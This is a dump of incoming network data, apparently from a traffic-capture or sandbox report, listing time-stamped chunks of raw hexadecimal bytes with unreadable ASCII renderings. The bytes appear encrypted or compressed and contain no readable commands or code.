                                                                                                                                                            2022-09-29 12:45:15 UTC18709INData Raw: 23 4e 87 66 43 77 a2 46 88 71 dd 3b 94 d0 06 d4 5a d7 31 4c af 74 91 83 4d b3 ee 6f e3 54 23 dd a8 25 e2 7b 0c a0 92 77 08 76 5c 5c 65 36 96 12 b5 cb ff 1f 6e 59 b3 45 73 c9 71 9f 4c 8e 6a ef f0 26 11 9d 8b 2a 69 6b b3 23 02 89 6b bd 85 af af 03 6c df d6 13 d6 de fa 48 ad bd 37 34 0e 89 89 2d 7b bd d5 03 f0 43 02 90 8a ad a8 49 d0 b2 9c a7 50 94 a9 3a 16 20 c2 ca 44 2e d4 98 af 33 95 01 73 11 47 74 d4 00 5e 2a 2f 58 b3 aa 05 57 ff 39 ff fc 99 82 96 0b 77 3e cc 84 1b a6 a7 30 62 83 6c 35 d7 7e 59 7f da 97 d2 21 1d 92 22 a1 c7 95 6d c5 72 ca 39 64 23 5c d7 ac 3f 4d 22 3b 63 b9 f9 8b a6 7a 52 1d a9 eb 6b 72 85 36 e2 66 f4 98 98 4b 05 a5 a2 5e ef 2d 66 e3 6d 75 59 90 38 ff ce 08 c9 c6 65 c4 64 3c 5a 08 56 4e 07 bf b8 65 76 44 6a 3d 58 7a 25 72 4a 4e 39 5e c5
                                                                                                                                                            Data Ascii: #NfCwFq;Z1LtMoT#%{wv\\e6nYEsqLj&*ik#klH74-{CIP: D.3sGt^*/XW9w>0bl5~Y!"mr9d#\?M";czRkr6fK^-fmuY8ed<ZVNevDj=Xz%rJN9^
                                                                                                                                                            2022-09-29 12:45:15 UTC18725INData Raw: d1 83 87 d3 03 c3 d2 bc 53 c0 d4 ac 58 74 2e 58 8d 0d 57 a5 c3 d8 96 46 70 8e 9b 21 e0 80 81 9d f0 35 05 3b e3 df ce d5 cd 8d c8 c8 9c 4f 74 c2 46 cb e9 42 15 30 cf e8 8b ec a7 58 c5 1c 21 4b bc 05 43 cb ea 13 b0 01 f6 dd 33 cd 1e e6 a3 80 24 e7 bd 27 d8 ae fa a7 c6 0b 56 93 3b a0 ce 2f 19 12 81 e6 55 29 33 08 13 e1 0b c3 2f ca 15 a8 b8 ee 3b 08 02 52 ab d2 cc 34 5d 39 c2 61 57 d7 ce 78 25 ca 48 a2 1f bd 4d 00 7c bb 6d 24 3e 27 04 0b 8d fd 1d c1 7d 82 82 82 74 3e c2 a4 04 e7 70 c0 28 9c bf 9f b7 90 a1 ef 65 4c 97 60 61 bf 53 fa 4f 7d 37 66 e6 52 d8 c1 ae c6 10 42 4e e2 a0 24 e8 30 44 6b 3f 22 84 c4 5e d7 60 d7 d2 d5 95 4e 27 db 07 52 e3 ba fa 46 67 64 b2 be 00 70 30 7e 75 d0 e9 d3 44 47 3e 9d a2 ab 8c 0d e0 df 79 12 6b ff 43 21 54 b3 0b 62 ea 5b 86 d4 e5
                                                                                                                                                            Data Ascii: SXt.XWFp!5;OtFB0X!KC3$'V;/U)3/;R4]9aWx%HM|m$>'}t>p(eL`aSO}7fRBN$0Dk?"^`N'RFgdp0~uDG>ykC!Tb[
                                                                                                                                                            2022-09-29 12:45:15 UTC18741INData Raw: 03 ec 6d 28 7b c0 e3 2c ac af 2f 18 a5 e2 fd e3 18 15 76 16 6a 58 75 80 97 91 24 cd d0 c3 15 ac 83 b0 5e 03 a9 ba ce af ca 20 cb bf 0a ad 85 4c 1f cb 7e 4e 0a c3 d9 82 04 e4 f8 6d e5 e3 06 25 6b 89 76 a9 3c 39 c9 97 d2 01 9a 58 aa 4d dd fd b6 7a b5 e4 97 e7 a8 0d 36 ba c0 83 87 92 1e 15 aa a9 d0 55 e3 94 e7 dc 8f 45 d5 d3 08 cb 11 94 ab 6f 36 51 0c b2 51 4a 8f 43 c8 89 39 7e cf d2 61 b1 57 cf bb 24 ea 37 ba e4 a3 7e 02 b2 77 92 e1 d5 f6 e1 b6 7e 65 f5 57 16 96 2a ca d2 e0 dd a8 aa b3 bb 46 ef c7 a8 9c b4 e6 27 9f e6 93 b2 02 63 3a 5b ff 24 74 a4 df 78 91 4a 63 fb 6e 1d cf 56 32 04 d7 d3 84 37 73 36 8e 18 6a fa 95 3e d9 d0 c0 50 55 95 bb d8 21 c6 b4 6f d8 7a ee 94 26 60 d2 fb 4f 98 b4 87 63 df 30 ba 58 50 9b 4f f9 87 c3 7e d2 12 4a a3 6d 4c 09 45 7f 5a 43
                                                                                                                                                            Data Ascii: m({,/vjXu$^ L~Nm%kv<9XMz6UEo6QQJC9~aW$7~w~eW*F'c:[$txJcnV27s6j>PU!oz&`Oc0XPO~JmLEZC
                                                                                                                                                            2022-09-29 12:45:15 UTC18757INData Raw: 72 e8 d2 35 6c 19 e8 3c 9b 39 fb 72 0f 44 21 9e 6e 74 7a e6 c3 77 be 30 9d 9d 70 7f 67 6c c5 09 a9 02 d2 77 87 e5 c4 95 aa 25 f5 bc 55 7f 4a c5 cc f8 bf 37 be b9 73 62 52 78 bb 3a cc d9 91 16 b8 20 61 21 1c 0d 0d ee 31 a7 e3 c8 b4 92 de f0 97 29 b9 54 6f 79 70 15 c8 74 f7 55 fa 2b ed c2 ba bd 07 cc be bf 5f 81 40 6e 76 2d f5 71 0e bf c0 a3 24 5b 7a 69 f5 c8 67 79 cf ed f0 18 ac 11 74 8a 1f ac 27 ef 95 4d 90 b8 c4 62 c9 1b a7 1c c7 55 5e cc 8f 87 40 2a 00 c8 cd da 19 ab 13 c1 28 67 8b 41 ec f1 0e 99 76 4c 5f ea 9d a6 47 5a 1d ee 24 6e af 72 38 34 01 44 25 dd 12 93 32 60 09 b8 a4 56 c8 cb 4e 3f ae d6 54 e1 ca d4 3d 9c 00 a0 2d 5e f5 b4 62 66 00 65 c2 3f 26 94 7c 79 f5 99 79 42 81 1b 2c 6b 17 cc 75 37 56 d0 4e 1c 11 b6 01 83 94 1f f9 8a 82 26 2f e1 10 5f d8
                                                                                                                                                            Data Ascii: r5l<9rD!ntzw0pglw%UJ7sbRx: a!1)ToyptU+_@nv-q$[zigyt'MbU^@*(gAvL_GZ$nr84D%2`VN?T=-^bfe?&|yyB,ku7VN&/_
                                                                                                                                                            2022-09-29 12:45:15 UTC18773INData Raw: 74 83 64 61 c7 b9 9c 9d 2d 8a 61 a6 e4 98 ce 88 0e fe 11 9f c9 bb e9 71 27 1c db d3 48 5f ad 6d ad 74 cc d6 a7 0f 21 31 6d e1 c4 0f 05 7a 00 9d ae ce d8 8a e1 23 05 ea de 7f ef c9 be 20 b9 2e c1 e3 a3 a6 96 4a dc 79 3e 3e ce 8c 56 fd 24 de 28 15 07 47 8e 22 c8 54 e2 b2 46 6c b6 0a 23 5a bb 2a 52 c9 48 72 30 71 a9 12 f1 62 7e 4a f1 ca ba 61 69 7b 49 27 fd cb c5 dd 9c 86 89 7d 26 f0 eb f8 da 73 34 b1 4c 0c d7 1e a9 67 e1 3c 2c 4b 7f ed 5f 70 95 af b3 9c 56 c3 4d 97 28 77 c0 fd f9 26 6a 9b e6 81 af 0c 24 5b b9 1f 4b f9 ea c3 f3 09 e2 3a e4 0e 3a 59 73 6d f8 6d a5 2a 4f c3 56 44 61 cf 4f 27 cd 7a 1f 1c b1 92 ae 86 52 1a 23 59 ba d8 3d e5 f2 fe 4e 36 4f 36 a1 c4 cf 69 90 ec 8d 71 d0 0e 59 f9 cd 8e 06 6a 24 4e 23 18 c7 fb 11 1b 77 61 9a 7d b6 21 33 36 2d fe d5
                                                                                                                                                            Data Ascii: tda-aq'H_mt!1mz# .Jy>>V$(G"TFl#Z*RHr0qb~Jai{I'}&s4Lg<,K_pVM(w&j$[K::Ysmm*OVDaO'zR#Y=N6O6iqYj$N#wa}!36-
                                                                                                                                                            2022-09-29 12:45:15 UTC18789INData Raw: 31 ea 4a 6c 44 08 5a 44 03 74 6e de 1f d6 bf 60 d9 0c d7 88 4c af 6f 25 4f 9f a6 52 f7 93 2f 00 d8 21 e7 59 8d 54 03 a0 05 67 5a c5 98 dc 54 74 cb 09 7b 53 23 07 65 64 22 58 7c 5b 13 cc 5e c6 03 83 11 fe be 91 71 fb 2b f5 a4 ff 1e 03 a5 d6 53 ca 1c ea f3 61 25 27 dd 98 63 22 53 2f a4 a3 ee 41 2f d7 0d 26 0c 73 80 a2 cc 99 10 a4 c3 ec 52 3b 44 8f bc 30 3f a3 ce 6b 11 bd 3b 28 e5 2d 1d da 77 16 8d bc 0c 3d fe a2 80 5d d0 e9 05 25 75 26 02 f9 f1 5e 91 98 19 d7 62 74 50 e5 bf 9d 7a 60 40 fc 33 98 77 a6 af 9d 96 ab 1b 46 0a 85 ca 97 4d 5a 4c 09 f2 04 46 0f 01 26 f5 2d 45 b5 77 cc 28 66 5f e9 43 ba 0d 68 97 fe cd 71 12 fe ac 39 69 67 22 8d be 98 a7 f0 01 5a f8 1f 08 de 48 88 9d a5 c0 20 48 a1 d5 bc 0d 6d ef f5 46 20 d4 ce 74 03 41 cb 04 83 1b d6 bf 36 8c 5b 50
                                                                                                                                                            Data Ascii: 1JlDZDtn`Lo%OR/!YTgZTt{S#ed"X|[^q+Sa%'c"S/A/&sR;D0?k;(-w=]%u&^btPz`@3wFMZLF&-Ew(f_Chq9ig"ZH HmF tA6[P
                                                                                                                                                            2022-09-29 12:45:15 UTC18805INData Raw: 44 2d 0c cf 56 99 d8 35 9c 37 a1 08 db e0 f7 f3 e5 28 d2 aa 29 24 be 41 ad c1 5a a4 1b 50 f1 91 60 b3 c1 de 08 c0 6d 56 60 65 cb a1 bb b4 82 16 0f b3 4f b5 94 e6 ec ba c3 4d 48 9d ac 50 e2 a0 f7 ff 1a 62 ce 13 28 0a 9b 52 f1 ec 09 21 1a 78 63 ce 4b 17 89 38 3c 89 10 10 51 a0 78 04 eb 31 7e 9d b1 af a5 da f6 58 e4 80 9e 71 2d 37 62 f8 3a 7f 3f 94 81 aa df 9f a3 04 d2 ab 9a 9e 1a 82 00 e5 7b 8d 1d 26 79 34 a3 6b 59 e1 d5 8e e6 3c ca 50 bc 0c 8d 88 60 09 37 4f 2e 51 24 ca c2 ff 9d 14 f2 26 54 2c b7 ff 37 ec 12 ba ab 19 57 fe b4 cf 9f d7 51 59 c1 d4 3a cc 0e 3f ff ed 7c 44 f7 c4 81 38 df 28 7f 9f 50 a3 d0 64 39 1a 33 46 66 e6 11 d8 92 32 e9 de 25 88 2e 23 80 a5 28 28 27 73 7d 44 6f 97 46 92 04 3d 1d c0 93 1a 60 6e 32 1e 87 85 59 1d d6 c3 4b 7f 58 87 25 a0 8a
                                                                                                                                                            Data Ascii: D-V57()$AZP`mV`eOMHPb(R!xcK8<Qx1~Xq-7b:?{&y4kY<P`7O.Q$&T,7WQY:?|D8(Pd93Ff2%.#(('s}DoF=`n2YKX%
                                                                                                                                                            2022-09-29 12:45:15 UTC18821INData Raw: 96 2a fa e2 05 90 59 86 b7 dc 0c 29 93 4d 75 ad d9 a0 eb 96 0e 30 ec 4a 6c fd b1 11 1c 81 eb 69 e5 6b 90 14 97 38 85 94 ab 53 c5 bd 80 71 4f 9f 39 0e b7 0c 4b 98 ca b3 0f c0 64 79 4f 00 59 7e fb 53 c7 f8 38 2d 9b b6 db 8e e8 5d 32 8f 86 b8 98 c5 2f 06 5e c2 92 24 48 1c f1 5b 25 c9 d1 9e 83 98 98 bd dd be 2c 37 ae ec cf c3 34 6f 1f 51 4b d3 5d f3 66 b9 b8 80 12 97 80 1d 60 e1 f6 96 28 01 94 5a d1 d5 c3 f0 eb fc b2 61 9f 21 ca 02 41 d6 bf 22 72 8b 02 fd 17 52 13 03 50 4b b1 3d 80 ad 96 6f 8f b4 4d 63 62 92 2b 79 b4 e7 de 7f d6 5a 12 ac b1 a5 35 3e df dd 32 a2 cc 58 fa 00 9e 97 2f ea 90 11 15 11 db d1 ca 6f a2 2a 82 f7 26 cc f8 c2 9a 4e 48 c9 96 da 5f b0 fc 4d 8a 03 3b 8b 51 22 a5 e0 00 63 26 2d 5e c5 86 31 95 c9 d3 72 ce 47 01 64 14 64 1f 1c e9 c9 6a 5a 93
                                                                                                                                                            Data Ascii: *Y)Mu0Jlik8SqO9KdyOY~S8-]2/^$H[%,74oQK]f`(Za!A"rRPK=oMcb+yZ5>2X/o*&NH_M;Q"c&-^1rGddjZ
                                                                                                                                                            2022-09-29 12:45:15 UTC18837INData Raw: 29 50 83 ce 9f a7 39 5a 5e a4 bd f8 e2 84 3c 70 0c 79 5e 9a ae fd fa 5e 36 9a 90 b0 8d 12 79 cb d6 f2 bd 8c dd 3a 04 7b 75 b2 e2 b1 00 ae 23 9d 13 ad 65 22 41 03 0b fc b0 17 2d 8f 5c 38 e2 15 34 0a 8e f1 bc 8d af 8e 99 64 69 61 8c 95 a5 f7 30 c7 05 b6 35 a5 11 a4 f1 f1 e6 01 32 09 22 ac ae 21 af 2e a6 f0 82 40 ed 84 44 2f f6 13 b6 56 78 b2 52 c6 28 5e 4c b4 38 c4 be ff a9 40 ba a4 19 87 32 96 d1 c6 71 66 62 e0 ae c8 39 4b 9a 84 ac 80 79 4a 03 c8 a4 9c 45 66 9e c9 06 88 94 84 76 1b 24 2e 84 7e 4b 34 74 2a 43 23 73 a3 8b b8 20 64 d3 9d 01 9f b8 26 a5 d2 4f 76 65 34 ad df 5c 33 e2 7f c1 5f af 5f c9 0d 57 19 af 17 f9 c2 a3 28 1b 5e 57 e6 97 eb 3c ec 6d a0 af c1 98 3d 93 3c 82 10 11 84 12 13 26 91 ea 9c a2 e1 5e 66 36 0c 1d d4 d6 30 97 66 76 00 c0 63 67 39 8b
                                                                                                                                                            Data Ascii: )P9Z^<py^^6y:{u#e"A-\84dia052"!.@D/VxR(^L8@2qfb9KyJEfv$.~K4t*C#s d&Ove4\3__W(^W<m=<&^f60fvcg9
                                                                                                                                                            2022-09-29 12:45:15 UTC18853INData Raw: e2 58 ba 9d 2d 4d 4f d1 b8 af 27 1f 42 bf 49 51 df f9 de b0 06 a1 7b 7a 5f 01 22 3f aa fb bf a5 79 e4 3e ef 44 15 1d 32 04 06 a7 7b 37 3a 63 71 f4 67 9a 0b e3 a9 da 67 fd 9d 54 04 e5 95 ae 26 b2 f2 47 27 b6 2d e3 2f f7 32 8d cd bc de cf f9 01 75 da af d6 05 85 cc bb 74 73 4c f1 27 1f 1e 09 a8 be 57 b8 49 f2 95 04 d1 08 73 d9 81 d3 76 bf 95 f2 da b0 c4 5a b9 e0 30 bc c9 c0 e6 21 26 df b2 ac f8 09 42 b8 2a 9f ff bd 79 10 22 35 e7 60 24 8f 50 4e d6 18 88 3f bf 49 71 7f 36 a5 68 4c d4 52 f7 4a 98 2b 10 52 a2 ea e8 b5 86 e7 a9 60 56 66 90 2b 0d a7 7a f1 46 4c 37 9a ef ec bb 69 58 c3 da d4 24 02 20 8a b3 49 d1 7f 36 a4 ad b3 42 40 6b 3d 96 93 04 36 7d 91 e1 a3 72 34 af da 21 e1 86 7b 47 ee 9f 62 fd 2c 88 64 66 c2 cf 60 ec 17 ef 35 cb 37 5b b2 91 1e 28 6b 52 e0
                                                                                                                                                            Data Ascii: X-MO'BIQ{z_"?y>D2{7:cqggT&G'-/2utsL'WIsvZ0!&B*y"5`$PN?Iq6hLRJ+R`Vf+zFL7iX$ I6B@k=6}r4!{Gb,df`57[(kR
                                                                                                                                                            2022-09-29 12:45:15 UTC18869INData Raw: 0c 99 47 47 54 86 3e 86 95 59 df 19 ce 38 b2 cc 5f 9a ec 49 97 db ab dc 0b 26 6e 2e 83 4f 64 52 b4 55 87 bc 3e 13 0e 01 74 b5 a2 ec 0a f3 06 ea df 74 7d 89 c6 aa af 0d e1 ee bf 59 38 39 e9 fb 14 e9 84 63 91 1e b4 37 91 56 d2 15 37 bd 50 c1 05 9a 4f dd 70 35 86 36 a8 56 ce 1a fd 70 c4 8a 70 1f 44 06 58 5e e8 4e bf c2 cb 23 3a 1e 0c 90 5c d9 c2 b8 65 b2 69 f9 e1 f8 db 23 f3 65 e9 db f0 52 28 95 1e 12 62 e4 fb de 7d f1 40 87 57 f4 5b 76 eb ab c2 05 10 33 cd 03 6d 08 40 4b b5 90 dd b9 42 e9 3e 96 2c f1 0e 3f bc b3 24 10 80 01 15 04 5c 8f 9f b3 dd 32 f1 ce f6 14 23 ac b1 3e 53 c0 11 ac fd 4f 93 73 85 d0 03 f2 43 47 d2 89 d3 6d 9d 65 b0 7c 79 9f cc b2 d7 a5 96 16 71 83 3c b9 c6 19 a4 ab fd 30 bd a5 02 b5 3b ca 42 d8 86 35 80 6b 84 ff 94 b4 31 ff 57 74 a8 ce 58
                                                                                                                                                            Data Ascii: GGT>Y8_I&n.OdRU>tt}Y89c7V7POp56VppDX^N#:\ei#eR(b}@W[v3m@KB>,?$\2#>SOsCGme|yq<0;B5k1WtX
                                                                                                                                                            2022-09-29 12:45:15 UTC18885INData Raw: c5 22 66 c5 4f 29 89 ac bc b5 b7 ef 92 66 73 79 a2 66 d0 33 f0 3f 13 80 a3 98 b6 9a 85 6b c0 5c 3f a3 8c d2 cd bf 39 53 b2 2a 68 4a e6 e3 e6 61 ee 6a 27 a2 ee 52 dd 2f 59 ab 2c cc 40 f2 71 a2 3f e3 f4 16 85 3a db 0e a3 a5 14 b6 8c 1c 30 f0 35 4b f4 aa ad 0c 5a c8 a1 4a 95 34 5a 91 97 58 7f 86 7d 16 c0 a8 2a 59 b5 d0 f6 bf 2e d0 0a 37 95 ca b3 2a b5 8b cc de 38 ae 53 e4 ad 0d 2b 4d 41 36 a0 79 8c 21 b1 4a e6 80 2e d7 a2 06 e0 9a 56 88 9e 3d 60 69 fb 3c 6a 93 52 97 ad 9d 9f 1b 29 af 23 4b b5 03 98 fc 43 86 d9 cf de 8f c2 9e 26 5a c2 d4 96 d0 67 21 f6 6f 76 50 6d 53 82 54 ce c3 07 9a 27 80 82 7b a3 58 67 5a d5 7a b8 8c 58 a0 ef 8a 6b 04 02 08 90 52 70 38 be b0 4d c5 11 60 2a 98 68 51 7d 72 29 27 3c 48 65 0f 79 c6 66 84 01 39 2d 9e 8c dc 27 2b 44 63 13 40 09
                                                                                                                                                            Data Ascii: "fO)fsyf3?k\?9S*hJaj'R/Y,@q?:05KZJ4ZX}*Y.7*8S+MA6y!J.V=`i<jR)#KC&Zg!ovPmST'{XgZzXkRp8M`*hQ}r)'<Heyf9-'+Dc@
                                                                                                                                                            2022-09-29 12:45:15 UTC18901INData Raw: 69 c1 33 8c 96 38 ad 5c 59 68 e3 75 a5 3f 27 db dc 69 e9 38 5a 0f f3 d2 00 81 29 ba 78 e4 79 89 76 bb 41 19 dd 47 ae 86 d9 53 2d 7e c5 e7 97 d7 b8 c3 88 7a 85 88 d1 20 8f c3 08 fe 86 d7 6a cd 98 d4 74 06 db e5 d0 a4 05 ac 6f 7a 36 f2 13 14 72 2f c3 b3 c7 e4 aa c7 e1 3d 67 32 cd 47 2c 43 f1 ee d1 1b e5 87 76 f5 93 f7 88 17 18 e5 47 36 0e ec 9c b6 47 67 97 b1 3f 2d 69 64 3e c6 e0 22 4c d9 46 f7 df 70 42 ab 16 8e 25 4a 8b 0e 5a ba 6b 1f 39 62 8b 9d 62 6c f7 c0 c4 63 c1 e3 4c e6 f4 43 ef f4 60 b6 1c 2d be cd f1 f6 8f d2 4f 6e 6c 4e b4 5f a6 14 6d 62 9d a3 35 96 ba f1 0f 5b 9c 81 34 f6 fb 26 d7 80 5c 62 f6 d9 4a 5f ce eb dd ae 2c bb 0e 12 78 5d da 54 60 fc d4 16 c2 c4 2e 25 d1 06 a8 9e dd 78 c1 38 3b 78 9b 5f 8c 45 b4 1b 68 ee e3 0d dd f2 f0 8b c7 68 b0 15 bd
                                                                                                                                                            Data Ascii: i38\Yhu?'i8Z)xyvAGS-~z jtoz6r/=g2G,CvG6Gg?-id>"LFpB%JZk9bblcLC`-OnlN_mb5[4&\bJ_,x]T`.%x8;x_Ehh
                                                                                                                                                            2022-09-29 12:45:15 UTC18917INData Raw: 73 d4 5e e3 34 f5 4d 0e 32 71 58 21 8a 94 7b bd 7c 56 c0 7b cf 55 5c 3c 5c ac 66 59 3d af d6 bc 8d 72 5a f7 17 a6 1e fc 90 2e de 95 27 13 cf 4e 6d 93 d8 8c 9d 74 c9 36 4a 5c a1 f0 b1 2a 97 95 c4 fc f4 f6 be 8a 0e 3e 2f 18 a1 7d 23 b4 13 be 92 ad c7 3a c1 aa 3e f4 2d 62 37 d4 ca 8f 69 18 e5 d5 76 ed 50 24 c8 48 79 ef 34 3d 74 d1 0e e6 10 a0 32 90 9c 1b a6 dd 48 3a 8b d4 10 5a 53 b5 8a 99 f8 05 ce 2f e3 4a 41 ad 49 6b 7f 26 d2 0f 7d b2 f6 c6 7e 4c 1f 22 f7 c8 fb 75 02 5d ce 10 23 e4 74 f9 8b 79 36 06 de 39 4f 10 af e5 9a 37 2b 0e 83 af 33 c0 13 84 2d 76 a0 b6 51 7f 49 bd 7e 87 32 fb 63 dd 39 ea aa a6 7d 79 ae 56 db 70 c2 83 15 60 32 cc e0 cd 08 2c 82 dd ca c5 85 17 de 50 59 e7 9e 94 c0 28 35 bf bf 70 15 b7 b6 5a 6e ae 27 eb e3 c5 46 19 80 82 b3 e6 a2 c8 0a
                                                                                                                                                            Data Ascii: s^4M2qX!{|V{U\<\fY=rZ.'Nmt6J\*>/}#:>-b7ivP$Hy4=t2H:ZS/JAIk&}~L"u]#ty69O7+3-vQI~2c9}yVp`2,PY(5pZn'F
                                                                                                                                                            2022-09-29 12:45:15 UTC18933INData Raw: 6c da be fe 18 76 0c cd e1 97 16 85 9e eb b8 0f c0 6f e0 9d e5 74 60 44 5c 33 e2 ed dc d1 9b 86 02 87 39 e7 37 5d 27 d4 15 8f fc 51 1d 30 8a 76 ed 38 c0 bf 6f 93 84 e5 aa 3e bf 60 21 c5 05 3c 2c d0 d2 cf e3 de d1 3b 08 53 00 26 90 6f cd 79 4b 9d 3e 8a 92 e1 2f 9c f8 d5 1c a7 0b 76 b3 c9 44 d3 25 8d 8a d6 9c a3 5a f8 4b 1a 52 e1 2e de ae c9 94 9b 69 1f ff 5f b3 27 b8 29 64 4a 59 a8 cd 29 7a 8a 4c 85 26 97 c8 02 b7 b5 2d 75 6e ce 0e ef 2e b9 09 26 ac 53 23 a5 12 74 ec 94 78 19 65 66 4c 50 4f 24 ca 2d 68 e9 7e 91 57 bf 0b c5 ca 2f 69 66 35 48 63 0c 09 13 af cb d2 1f e1 ae 8a e4 a1 f9 4a 69 96 2d 6c f4 09 9a 39 34 f8 bb 2b 08 b8 c6 33 dd da 30 8b a5 c1 c6 fa de 07 da 86 6f b4 d3 b2 0f dc bb b8 64 30 28 56 0b 65 e8 16 96 48 18 d7 8f 18 d9 fa 17 ee c9 cf 07 b1
                                                                                                                                                            Data Ascii: lvot`D\397]'Q0v8o>`!<,;S&oyK>/vD%ZKR.i_')dJY)zL&-un.&S#txefLPO$-h~W/if5HcJi-l94+30od0(VeH
                                                                                                                                                            2022-09-29 12:45:15 UTC18949INData Raw: bb 67 1c 83 89 1b 41 d0 29 fc d7 2b 3d a5 bb 44 35 c8 27 0d bd 5d b4 e2 4e 1d 11 ad 70 39 1a 79 8e 3c bc e4 4d b2 9c 9e 6a d0 5f a2 85 b1 61 db fe a9 0f 9a 1a 79 9a 56 6b a9 17 a8 40 a5 a0 34 f3 70 ef f3 75 d4 e8 39 91 31 11 23 63 65 93 5e 88 8e f8 fb 56 11 47 31 8d a4 d5 2f 77 b9 dc db b5 38 85 81 80 5a b5 13 09 e7 be 51 fe cd b8 8d 42 3b 9f 15 da cb 6a b5 2f 46 73 2c ab 74 c6 db 43 1d b3 10 7d 02 8b d0 22 7c 48 fa f2 98 ec fa b2 81 4b 40 3c c3 05 14 55 a2 de a9 a9 a3 a0 7f b0 dd 78 d6 ac 27 17 14 f8 f8 c6 ee 62 4b d5 7d f6 9a ba 5e 56 56 e8 cf 2a 9b 82 21 54 ad 85 da d2 e1 37 d3 62 0a 02 d2 bb e5 ec a3 8a f5 1c c8 c6 1c af 90 7a c0 bc 88 f1 92 e9 a5 72 bb aa 28 d4 12 b3 d5 3c 30 93 58 78 46 7b 35 9a 04 51 7d fa 68 41 27 d3 18 72 df 79 08 ce 6a 59 37 9b
                                                                                                                                                            Data Ascii: gA)+=D5']Np9y<Mj_ayVk@4pu91#ce^VG1/w8ZQB;j/Fs,tC}"|HK@<Ux'bK}^VV*!T7bzr(<0XxF{5Q}hA'ryjY7
                                                                                                                                                            2022-09-29 12:45:15 UTC18965INData Raw: 71 b7 e9 83 3f 9f 21 de 3a 64 a0 b9 ac 34 d6 f3 c6 89 67 8d ae 52 09 4f 5f ea 74 56 74 2b cd 77 e7 26 d7 6a 0b 3e 9b 6a b2 b5 8b 57 48 82 e1 f4 4d 12 88 82 5c 49 66 a8 46 c5 0a 5f 10 5f 40 0c 29 4a 43 75 39 9a 8a e9 6e 7a 60 93 a3 73 cc a4 eb a6 71 b6 24 6a 9a 90 53 1c 7f bb 9c 52 bd 38 cd 98 d5 a9 05 7a 37 fb 2a 12 2b e2 4a 0c 4c ff da b9 2e 12 31 07 3d bc 79 96 7b ea 63 c6 da 16 3e cf 97 eb 31 66 b8 bd 6a ed eb e0 a2 46 14 3c 55 4c 1e 1d 89 ff 5e 85 36 87 cb b1 e6 42 e9 6e fa a4 15 d6 43 2f 22 57 94 5b 53 6d 65 6c 5e 1a 06 5c b0 3d fa 02 7a 11 09 4d 70 97 95 22 42 2b b8 41 49 7f 65 8c 31 25 fc 6e 69 d7 6a 2b 4a e3 d4 27 13 ad 91 8e d3 13 48 33 78 41 60 e1 29 50 33 06 a1 e0 c3 61 a6 40 9f 07 90 c6 ce 29 82 9f 6b 22 db ec be dc 36 14 b6 60 0a 89 bb 04 e5
                                                                                                                                                            Data Ascii: q?!:d4gRO_tVt+w&j>jWHM\IfF__@)JCu9nz`sq$jSR8z7*+JL.1=y{c>1fjF<UL^6BnC/"W[Smel^\=zMp"B+AIe1%nij+J'H3xA`)P3a@)k"6`
                                                                                                                                                            2022-09-29 12:45:15 UTC18981INData Raw: ef 7c 60 73 10 38 dc 5b 68 f5 87 10 ac 3e d9 ea a9 11 8f 41 06 01 97 5d 1f d9 b7 2d e4 51 77 68 65 ea 73 5e 98 bc de bc 53 e9 49 63 ad fc 64 ac 06 5a 41 a8 e0 41 a7 f7 a9 de 13 78 78 1f 61 74 36 f5 30 6d 79 88 0c df 7b 94 52 24 72 4c 33 3e 82 55 1c 54 02 76 3e 5f 35 8b ef 1d 15 77 f8 ea ca 4b 7a 6a b8 02 81 98 6e ba 93 49 0f 84 98 66 91 b8 15 cf 93 a3 cc 23 2f d2 c8 be bf e7 ef a6 a0 61 d8 a4 64 5c 64 af 7e 5a 78 b3 d6 d5 b0 33 23 03 c5 c4 b1 9e 8d 64 ba cb 30 ad ef e7 e4 4a 5c d1 6e a2 1b 88 3a fd d3 5d e1 8d e4 69 a9 da d2 e6 3f a8 62 14 6c 33 32 4d 53 9d d0 32 90 33 ac 8c 16 4e 86 67 28 4d d9 ed 98 b4 3e 34 4f 0c aa 6d 07 d3 e7 20 82 0f c1 2e af eb dc 6e df 41 f5 6f fb 9e b0 ee da 46 47 81 d8 82 b9 cd b0 b9 6b c3 e4 df 9c 43 af 9d bb b8 fa fb df 4d e0
                                                                                                                                                            Data Ascii: |`s8[h>A]-Qwhes^SIcdZAAxxat60my{R$rL3>UTv>_5wKzjnIf#/ad\d~Zx3#d0J\n:]i?bl32MS23Ng(M>4Om .nAoFGkCM
                                                                                                                                                            2022-09-29 12:45:15 UTC18997INData Raw: 49 19 cd a3 2a 9f 9b 59 be a8 a2 89 c8 65 89 0a 6d 6e 0f 68 78 8b ac 23 fa a2 1b ae b2 12 8d fc 2c 44 cc 10 ab 7b d8 28 b4 2d 95 0c 03 cc be 9f 45 90 a9 85 d2 9c a6 4c 5f c5 25 7d 3b 8d 3e 30 f4 72 b2 f6 ee 34 04 ea 76 0f bc fa 30 35 21 28 25 9d 9a 05 f0 23 08 9e 83 3b da b7 30 c6 85 a5 3b 5e 8a 9f c3 c8 6a ca 4b d3 0c 3c 06 62 c3 d2 cb 62 44 dd 4e 3c 2a 58 fa cf bf bb c2 04 82 dc 00 b2 29 89 6c 08 1d e0 d4 6b d8 75 cc 4d ef df 8b 2a ec 72 16 c4 16 a3 d6 cd 93 a8 84 48 d0 65 49 34 67 25 e6 5a 25 54 bb 39 65 37 d5 4b 52 00 c0 3e bb a4 b2 1e 0c 39 0a e1 e3 d0 f9 79 56 5c b4 12 f3 39 d9 2c 1d ea b2 45 88 dd 3b 05 2b bd ae ff a1 1b c6 35 8e 57 29 12 3d 3d b1 a0 b1 01 56 5d a1 2f c5 97 f9 a4 7b ff e8 4a 77 c2 0d 99 d2 8b 1b 3a 5f 51 1e fa 74 0e f6 f1 bd c5 13
                                                                                                                                                            Data Ascii: I*Yemnhx#,D{(-EL_%};>0r4v05!(%#;0;^jK<bbDN<*X)lkuM*rHeI4g%Z%T9e7KR>9yV\9,E;+5W)==V]/{Jw:_Qt
